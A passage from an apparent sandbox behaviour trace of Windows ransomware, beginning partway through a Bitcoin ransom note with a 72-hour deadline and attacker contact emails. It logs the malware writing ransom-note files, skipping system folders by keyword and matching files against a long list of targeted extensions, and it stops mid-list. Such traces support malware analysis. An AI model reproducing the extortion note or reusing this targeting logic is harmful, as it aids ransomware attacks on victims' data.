Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.503] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0172.505] CloseHandle (hObject=0x390) returned 1
	[0172.506] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.507] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.508] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0172.509] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.509] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.510] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.510] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.510] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0172.511] CloseHandle (hObject=0x390) returned 1
	[0172.511] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8056e330, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8059466d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0172.512] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*") returned 89
	[0172.512] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.512] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*") returned 0x59
	[0172.512] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.512] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0172.512] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.512] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0172.512] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.513] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0172.513] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.513] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.513] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.513] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0172.513] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.513] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0172.513] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.514] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.514] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0172.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.514] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0172.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.514] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0172.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.515] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0172.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.515] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0172.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.515] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.516] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0172.516] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.516] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0172.516] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.516] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0172.516] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.516] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0172.516] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.517] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0172.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.517] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0172.517] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.517] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.517] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8056e330, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8059466d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="..", cAlternateFileName="")) returned 1
	[0172.517] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.517] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8059466d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8059466d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x805baa67, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.517] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8056e330, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8056e330, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8059466d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.517] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0172.518] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0172.518] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0172.518] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov"
	[0172.518] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\"
	[0172.518] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime"
	[0172.518] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime"
	[0172.518] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\"
	[0172.518] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\"
	[0172.518] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*"
	[0172.519] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName=".", cAlternateFileName="")) returned 0xfb91b0
	[0172.519] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*") returned 97
	[0172.519] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.519] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*") returned 0x61
	[0172.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.519] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0172.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0172.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0172.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0172.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0172.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0172.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0172.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0172.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0172.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0172.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0172.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0172.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0172.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0172.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0172.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0172.524] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="..", cAlternateFileName="")) returned 1
	[0172.524] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1397a49, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1397a49, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13bdcbd, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0172.525] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0172.534] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0172.535] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\"
	[0172.535] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml"
	[0172.535] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0172.535] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.535] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0172.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.535] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.535] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"
	[0172.536] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml") returned 109
	[0172.536] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.536] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0172.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.536] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.